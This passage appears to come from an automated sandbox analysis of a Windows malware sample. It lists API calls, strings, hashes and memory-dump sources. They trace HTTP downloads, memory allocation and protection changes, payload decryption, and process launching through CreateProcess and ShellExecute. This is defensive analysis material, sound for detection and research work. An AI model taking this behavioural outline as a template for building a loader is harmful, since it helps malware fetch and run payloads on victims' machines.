                                            • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                            • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                            • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                            • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                            • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                            • String ID: GET$http://
                                            • API String ID: 1233269984-1632879366
                                            • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                            • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                            • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                            • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0

                                            Control-flow Graph

                                            APIs
                                            • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401873
                                            • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401899
                                            • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018BF
                                              • Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 00402599
                                            • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018E5
                                            Strings
                                            • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401832
                                            • text, xrefs: 00401B5F
                                            • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018C3
                                            • GET, xrefs: 004020B7
                                            • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 00401877
                                            • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 0040189D
                                            • http://, xrefs: 00401EC4, 004021A3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                            • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                                            • API String ID: 2146599340-4172842843

                                            Control-flow Graph

                                            • Graph not reproduced; API calls on the graph: VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04B3024D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID: cess$kernel32.dll
                                            • API String ID: 4275171209-1230238691

                                            Control-flow Graph

                                            • Graph not reproduced; API calls on the graph: InternetSetFilePointer, InternetReadFile, HttpQueryInfoA, CoCreateInstance
                                            APIs
                                            • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                            • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                            • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                            • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                            • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                            • String ID: text
                                            • API String ID: 1154000607-999008199
                                            APIs
                                              • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,CA335CE0), ref: 004107F7
                                              • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                            • Sleep.KERNEL32(000005DC), ref: 00405A90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: SUB=$get$U%
                                            • API String ID: 2563648476-1840017472

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                              • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                            • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: .exe$open
                                            • API String ID: 1627157292-49952409

                                            Control-flow Graph

                                            • Graph not reproduced; API calls on the graph: InternetOpenA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: http://
                                            • API String ID: 0-1121587658

                                            Control-flow Graph

                                            • Graph not reproduced; API calls on the graph: VirtualProtect
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00A74F3F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A1000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9a1000_file.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID: 8Fv$V
                                            • API String ID: 544645111-3398435390

                                            Control-flow Graph

                                            • Graph not reproduced; API calls on the graph: RegOpenKeyA, GetNativeSystemInfo
                                            APIs
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009A9B8E
                                            • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009A9BB5
                                            • GetNativeSystemInfo.KERNEL32(?), ref: 009A9C0C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A1000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9a1000_file.jbxd
                                            Similarity
                                            • API ID: Open$InfoNativeSystem
                                            • String ID:
                                            • API String ID: 1247124224-0

                                            Control-flow Graph

                                            • Graph not reproduced; API calls on the graph: RegOpenKeyA, GetNativeSystemInfo
                                            APIs
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009A9B8E
                                            • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009A9BB5
                                            • GetNativeSystemInfo.KERNEL32(?), ref: 009A9C0C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A1000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9a1000_file.jbxd
                                            Similarity
                                            • API ID: Open$InfoNativeSystem
                                            • String ID:
                                            • API String ID: 1247124224-0

                                            Control-flow Graph

                                            • Graph not reproduced; API calls on the graph: CreateFileA, WriteFile, CloseHandle
                                            APIs
                                            • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402226
                                            • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402247
                                            • CloseHandle.KERNEL32(00000000), ref: 0040224E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleWrite
                                            • String ID:
                                            • API String ID: 1065093856-0

                                            Control-flow Graph

                                            • Graph not reproduced; API calls on the graph: GetCurrentProcess, TerminateProcess, ExitProcess
                                            APIs
                                            • GetCurrentProcess.KERNEL32(08758BC2,?,00410530,00000016,0040CDA2,?,08758BC2,CA335CE0,0040CDA2,08758BC2), ref: 00410547
                                            • TerminateProcess.KERNEL32(00000000,?,00410530,00000016,0040CDA2,?,08758BC2,CA335CE0,0040CDA2,08758BC2), ref: 0041054E
                                            • ExitProcess.KERNEL32 ref: 00410560
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Process$CurrentExitTerminate
                                            • String ID:
                                            • API String ID: 1703294689-0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a9f000_file.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: X#
                                            • API String ID: 3472027048-2102606547
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,00418A2B,00000000,00000000,00000000,?,00418A50,00000000,00000007,00000000,?,00418D2F,00000000,00000000), ref: 004132C7
                                            • GetLastError.KERNEL32(00000000,?,00418A2B,00000000,00000000,00000000,?,00418A50,00000000,00000007,00000000,?,00418D2F,00000000,00000000), ref: 004132D2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 485612231-0
                                            APIs
                                            • SetErrorMode.KERNEL32(00000400,?,?,04B30223,?,?), ref: 04B30E19
                                            • SetErrorMode.KERNEL32(00000000,?,?,04B30223,?,?), ref: 04B30E1E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00402809,00402805,?,0040AD1B,0040280B,00402805,0042D884,?,?,00403597,?,00402809,00402805), ref: 00413CAB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                                            • Instruction ID: d9d624181c4160d02ab49c773ca7be82655902724fa9057d6622eb650e71da69
                                            • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                                            • Instruction Fuzzy Hash: BAE0E53350013057D6213F668C007DB7A4C9F413A2F180167EC18B62D0FA6CCE8141ED
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                            • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                            • Opcode Fuzzy Hash: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                            • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                            APIs
                                            • VirtualProtect.KERNEL32(?), ref: 00AA0688
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a9f000_file.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 313641539ed57d46eadc6db5f5ee68a832c6f3dbb26f0f7f367f2611c43db9b7
                                            • Instruction ID: 72bebe54cbcd4c1b21a3a6395e488c8d241c558ba3029e190c2772d5dabd2552
                                            • Opcode Fuzzy Hash: 313641539ed57d46eadc6db5f5ee68a832c6f3dbb26f0f7f367f2611c43db9b7
                                            • Instruction Fuzzy Hash: 70E04FB244835EDBDB42EF14C990A9F7B61EF8A200F208119B84043E45D7759C308A4A
                                            APIs
                                            • _free.LIBCMT ref: 10005C07
                                              • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                              • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ErrorFreeHeapLast_free
                                            • String ID:
                                            • API String ID: 1353095263-0
                                            • Opcode ID: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                            • Instruction ID: c87f8b0a48b83a8a7248450826a19003e4aa18d6d81e39a7cffe4d34c565a0dd
                                            • Opcode Fuzzy Hash: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                            • Instruction Fuzzy Hash: D9C04C75500208BBDB05DF45DD06A4E7BA9EB812A4F204054F41567291DAB5EF449691
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00F0CD9E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2923697726.0000000000F0C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F0C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_f0c000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction ID: c45bad4500735b764e5324259663bc145a2bc627cd6e75c41da29571dcd267e1
                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction Fuzzy Hash: C8112B79A40208EFDB01DF98C985E98BFF5AF08351F0580A4F9489B362D375EA50EB80
                                            APIs
                                            • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402E3F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 9b7f6f3ca0983af9e8fdb80d9d56c3a0869d2f15b64f49a49faae6a606d2425e
                                            • Instruction ID: eb79ea19b3e1abf3f5b24c483eecae43203cd8e5c5511bfeef65b24117358006
                                            • Opcode Fuzzy Hash: 9b7f6f3ca0983af9e8fdb80d9d56c3a0869d2f15b64f49a49faae6a606d2425e
                                            • Instruction Fuzzy Hash: 17C0483200020DFBCF025FD1EC048DA7F2AFB09260B00C020FA1844032C773A931ABA5
                                            APIs
                                            • VirtualFree.KERNELBASE(?,?,?), ref: 00402E5C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: FreeVirtual
                                            • String ID:
                                            • API String ID: 1263568516-0
                                            • Opcode ID: c340e0d22e4fb20872e2675f8e927c09d9f86923da33760a30bf271b1d9be8d1
                                            • Instruction ID: a3fa6bbe5c1a250ebea8c2fc35f655263c95a0ace9f7750fc45cf9fcc5ecde2d
                                            • Opcode Fuzzy Hash: c340e0d22e4fb20872e2675f8e927c09d9f86923da33760a30bf271b1d9be8d1
                                            • Instruction Fuzzy Hash: 5CB0923204020CFBCF025F81EC048D93F6AFB0C261B408020FA1C44031C7339675AB84
                                            APIs
                                            • GetTempPathA.KERNEL32(00000104,?,0042C014,0041F068,00000000), ref: 04B33FF1
                                            • Sleep.KERNEL32(000003E8), ref: 04B34189
                                            • __Init_thread_footer.LIBCMT ref: 04B3475E
                                            • __Init_thread_footer.LIBCMT ref: 04B34924
                                            • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,04B36D08,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 04B34B2E
                                            • __Init_thread_footer.LIBCMT ref: 04B34BBC
                                            • __Init_thread_footer.LIBCMT ref: 04B34E25
                                            • CoInitialize.OLE32(00000000), ref: 04B34EA6
                                            • CoCreateInstance.COMBASE(0041F290,00000000,00000001,0041F260,?), ref: 04B34EC1
                                            • __Init_thread_footer.LIBCMT ref: 04B35324
                                            • Sleep.KERNEL32(00000BB8,00000000,?,04B36CE8,0041D8A0,0042DB20,0042DB21), ref: 04B3553C
                                            • __Init_thread_footer.LIBCMT ref: 04B35632
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,04B36D08,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 04B34F2F
                                              • Part of subcall function 04B40A49: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04B35CE6,00000000,0042C014), ref: 04B40A5E
                                              • Part of subcall function 04B40A49: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B40A7D
                                            • __Init_thread_footer.LIBCMT ref: 04B3428D
                                              • Part of subcall function 04B39EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EAC
                                              • Part of subcall function 04B39EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39EDF
                                              • Part of subcall function 04B32457: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 04B3248D
                                              • Part of subcall function 04B32457: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 04B324AE
                                              • Part of subcall function 04B32457: CloseHandle.KERNEL32(00000000), ref: 04B324B5
                                            • __Init_thread_footer.LIBCMT ref: 04B34469
                                              • Part of subcall function 04B39EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EF7
                                              • Part of subcall function 04B39EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39F34
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Init_thread_footer$CriticalSection$File$CreateEnterLeavePathSleepTime$ByteCharCloseFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@WideWrite__ehfuncinfo$??2@
                                            • String ID: KDOX$]DFE$^OX*$viFO
                                            • API String ID: 529012138-4238671514
                                            • Opcode ID: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                            • Instruction ID: b593145d82870a6fc1d2920334d02843d9d5b5ae120ccabb0440fae50379a723
                                            • Opcode Fuzzy Hash: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                            • Instruction Fuzzy Hash: C3F2F2B0E042589FEB28CF25CC48B9DBBB0EF45309F5442E8E4096B291DB75BA85CF55
                                            APIs
                                            • __Init_thread_footer.LIBCMT ref: 04CF3426
                                            • __Init_thread_footer.LIBCMT ref: 04CF3602
                                            • __Init_thread_footer.LIBCMT ref: 04CF38F7
                                            • __Init_thread_footer.LIBCMT ref: 04CF3ABD
                                            • __Init_thread_footer.LIBCMT ref: 04CF44BD
                                            • __Init_thread_footer.LIBCMT ref: 04CF47CB
                                            • __Init_thread_footer.LIBCMT ref: 04CF3D55
                                              • Part of subcall function 04CFFBE2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04CFFC16
                                            • __Init_thread_footer.LIBCMT ref: 04CF3FBE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: Init_thread_footer$Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: KDOX$]DFE$^OX*$viFO
                                            • API String ID: 829385169-4238671514
                                            • Opcode ID: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                            • Instruction ID: ae2518c10b7240bfbf3f7855123300b7a987f6d8a73eb5c6b6008d334885f17f
                                            • Opcode Fuzzy Hash: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                            • Instruction Fuzzy Hash: 13F2F5B0E042549FEB64DF24CC48BADBBB2EF04304F5442D8D6096B291DB79BA85CF59
                                            APIs
                                            • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 04B33897
                                            • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 04B338BB
                                            • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04B33925
                                            • GetLastError.KERNEL32 ref: 04B3392F
                                            • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04B33957
                                            • GetLastError.KERNEL32 ref: 04B33961
                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04B33971
                                            • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04B33A33
                                            • CryptDestroyKey.ADVAPI32(?), ref: 04B33AA5
                                            Strings
                                            • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04B33873
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                                            • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                            • API String ID: 3761881897-63410773
                                            • Opcode ID: 40fbdad3a39ca36db9715c34553cb7c87d5092a534739f652b7b7891191c3091
                                            • Instruction ID: 38cc04df8a71c6855082909edac3cad1f9d42561c993af5c993a513f440f503f
                                            • Opcode Fuzzy Hash: 40fbdad3a39ca36db9715c34553cb7c87d5092a534739f652b7b7891191c3091
                                            • Instruction Fuzzy Hash: FF816B71A00218AFEF248F25CC45B9EBBB5EF49301F1481E9E94DA7291DB31AE858F51
                                            APIs
                                              • Part of subcall function 04B40A49: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04B35CE6,00000000,0042C014), ref: 04B40A5E
                                              • Part of subcall function 04B40A49: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B40A7D
                                              • Part of subcall function 04B39EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EF7
                                              • Part of subcall function 04B39EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39F34
                                            • __Init_thread_footer.LIBCMT ref: 04B35324
                                            • Sleep.KERNEL32(00000BB8,00000000,?,04B36CE8,0041D8A0,0042DB20,0042DB21), ref: 04B3553C
                                            • __Init_thread_footer.LIBCMT ref: 04B35632
                                            • Sleep.KERNEL32(000007D0), ref: 04B3599C
                                            • Sleep.KERNEL32(000007D0), ref: 04B359B6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep$CriticalInit_thread_footerSectionTime$EnterFileLeaveSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: DFEK$updateSW
                                            • API String ID: 3554146954-1114742100
                                            • Opcode ID: 77110f7e8cc78f45bd0e6b43112bb3db69cfffe81fb6a3c2c0fb0262c7cc4dea
                                            • Instruction ID: 3055a7e41b21dccbcaaa8ca119a724a9f22e98cadea9129be8f56bed535e2076
                                            • Opcode Fuzzy Hash: 77110f7e8cc78f45bd0e6b43112bb3db69cfffe81fb6a3c2c0fb0262c7cc4dea
                                            • Instruction Fuzzy Hash: AA3220B0E002549BEF28DF25CC887ADBBB0AF45309F1442E9D8096B291DB74BE84CF55
                                            APIs
                                              • Part of subcall function 04CFFBE2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04CFFC16
                                            • __Init_thread_footer.LIBCMT ref: 04CF44BD
                                            • __Init_thread_footer.LIBCMT ref: 04CF47CB
                                            Strings
                                            Memory Dump Source
